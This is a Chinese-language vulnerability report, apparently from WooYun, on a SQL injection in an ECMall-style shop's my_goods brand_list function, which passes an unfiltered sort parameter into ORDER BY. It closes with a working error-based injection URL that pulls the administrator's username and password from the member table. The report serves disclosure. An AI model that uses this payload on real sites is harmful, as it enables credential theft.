<h3>简要描述:</h3><p></p><p>不修复那我就一个一个的提出来</p><p></p><h3>详细说明:</h3><p> </p><p>缺陷文件:/app/my_goods.app.php<br><br></p><p>code 区域</p><pre><code>function brand_list()<br> {<br> if (!empty($_GET['brand_name']) || !empty($_GET['store']))<br> {<br> $_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'";<br> $_GET['store'] && $filtered = $filtered . " AND store_id = " . $this->_store_id;<br> }<br> if (isset($_GET['sort']) && isset($_GET['order']))<br> {<br> $sort = strtolower(trim($_GET['sort'])); //未过滤<br> $order = strtolower(trim($_GET['order']));<br> if (!in_array($order,array('asc','desc')))<br> {<br> $sort = 'store_id';<br> $order = 'desc';<br> }<br> }<br> else<br> {<br> $sort = 'store_id';<br> $order = 'desc';<br> }<br> $page = $this->_get_page(10);<br> $conditions = $this->_get_query_conditions($con);<br> $brand = $this->_brand_mod->find(array( //跟踪<br> 'conditions' => "(1=1 $conditions)" . $filtered,<br> 'limit'...
<h3>简要描述:</h3><p></p><p>不修复那我就一个一个的提出来</p><p></p><h3>详细说明:</h3><p> </p><p>缺陷文件:/app/my_goods.app.php<br><br></p><p>code 区域</p><pre><code>function brand_list()<br> {<br> if (!empty($_GET['brand_name']) || !empty($_GET['store']))<br> {<br> $_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'";<br> $_GET['store'] && $filtered = $filtered . " AND store_id = " . $this->_store_id;<br> }<br> if (isset($_GET['sort']) && isset($_GET['order']))<br> {<br> $sort = strtolower(trim($_GET['sort'])); //未过滤<br> $order = strtolower(trim($_GET['order']));<br> if (!in_array($order,array('asc','desc')))<br> {<br> $sort = 'store_id';<br> $order = 'desc';<br> }<br> }<br> else<br> {<br> $sort = 'store_id';<br> $order = 'desc';<br> }<br> $page = $this->_get_page(10);<br> $conditions = $this->_get_query_conditions($con);<br> $brand = $this->_brand_mod->find(array( //跟踪<br> 'conditions' => "(1=1 $conditions)" . $filtered,<br> 'limit' => $page['limit'],<br> 'order' => "$sort $order",//here<br> 'count' => true,<br> ));<br> <br> function find($params = array())<br> {<br> extract($this->_initFindParams($params));<br> <br> /* 字段(SELECT FROM) */<br> $fields = $this->getRealFields($fields);<br> $fields == '' && $fields = '*';<br> <br> $tables = $this->table . ' ' . $this->alias;<br> <br> /* 左联结(LEFT JOIN) */<br> $join_result = $this->_joinModel($tables, $join);<br> <br> /* 原来为($join_result || $index_key),忘了最初的用意,默认加上主键应该是只为了为获得索引的数组服务的,因此只跟索引键是否是主键有关 */<br> if ($index_key == $this->prikey || (is_array($index_key) && in_array($this->prikey, $index_key)))<br> {<br> /* 如果索引键里有主键,则默认在要查询字段后加上主键 */<br> $fields .= ",{$this->alias}.{$this->prikey}";<br> }<br> <br> /* 条件(WHERE) */<br> $conditions = $this->_getConditions($conditions, true);<br> <br> /* 排序(ORDER BY) */<br> $order && $order = ' ORDER BY ' . $this->getRealFields($order);//跟踪<br> ……<br> <br> function getRealFields($src_fields_list)<br> {<br> $fields = $src_fields_list;<br> if (!$src_fields_list)<br> {<br> $fields = '';<br> }<br> $fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e', "\$this->_getFieldTable('\\1') . '.\\2'", $fields);//对注射语句没有影响<br> <br> return $fields;<br> }<br> <br> function _getFieldTable($owner)<br> {<br> if ($owner == 'this')<br> {<br> return $this->alias;<br> }<br> else<br> {<br> $m =& m($owner);<br> if ($m === false)<br> {<br> /* 若没有对象,则原样返回 */<br> return $owner;<br> }<br> <br> return $m->alias;<br> }<br> }</code></pre><p><br><br><br><br>存在注射 </p><p> </p><p></p><h3>漏洞证明:</h3><p> </p><p><img src="http://www.wooyun.org/upload/201402/270104032e388c7ee46c77320a67bfdacc8d8e19.png" alt="aa.png" width="600"></p><p>利用方法:</p><p>注册会员开一个店铺</p><p>访问:index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23</p><p>即可爆出用户名密码</p>